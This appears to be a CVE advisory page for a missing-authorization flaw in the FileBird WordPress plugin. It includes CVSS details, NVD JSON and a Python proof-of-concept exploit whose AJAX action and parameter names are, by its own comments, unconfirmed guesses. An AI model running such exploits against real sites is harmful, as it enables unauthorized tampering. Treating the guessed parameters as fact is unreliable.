Security Vulnerability Report
CVE-2025-12900 CVSS 4.3 MEDIUM

CVE-2025-12900

Published: 2025-12-15 15:15:48
Last Modified: 2026-04-15 00:35:42

Description

The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 6.5.1 via the "ConvertController::insertToNewTable" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author level access and above, to inject global folders and reassign arbitrary media attachments to those folders under certain circumstances.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FileBird plugin <= 6.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12900 PoC - FileBird Authorization Bypass
# Target: WordPress site with FileBird plugin <= 6.5.1


def exploit_filebird(target_url, username, password):
    """
    Exploit missing authorization in FileBird plugin.
    Allows authenticated users to inject global folders and
    reassign arbitrary media attachments.
    """
    session = requests.Session()

    # Step 1: Login to WordPress as author user
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    resp = session.post(login_url, data=login_data)
    # WordPress names its auth cookie "wordpress_logged_in_<hash>", so match
    # on the prefix rather than the exact name (an exact match never succeeds).
    logged_in = any(name.startswith('wordpress_logged_in')
                    for name in session.cookies.get_dict())
    if not logged_in:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Exploit ConvertController::insertToNewTable
    # NOTE: the advisory text names only the vulnerable function; the AJAX
    # action name and parameter names below are this PoC's own assumptions
    # and are not confirmed by the advisory references.
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Inject malicious folder data
    exploit_data = {
        'action': 'filebird_convert_to_new_table',
        'key': 'malicious_folder_id',  # Unvalidated user input
        'folder_name': 'Injected Global Folder',
        'parent': 0,
        'type': 'global'  # Create as global folder
    }
    resp = session.post(exploit_url, data=exploit_data)
    if resp.status_code == 200:
        print("[+] Folder injection successful")
        print(f"[+] Response: {resp.text}")
    else:
        print("[-] Exploitation failed")
    return True


if __name__ == "__main__":
    # Three positional arguments are required: target_url, username, password
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_filebird(target, user, pwd)
```

References

https://plugins.trac.wordpress.org/changeset/3411587
https://www.wordfence.com/threat-intel/vulnerabilities/id/59592b27-d431-499a-b3c3-3d43a5513c36?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12900",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T15:15:47.860",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 6.5.1 via the \"ConvertController::insertToNewTable\" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author level access and above, to inject global folders and reassign arbitrary media attachments to those folders under certain circumstances."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3411587",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/59592b27-d431-499a-b3c3-3d43a5513c36?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```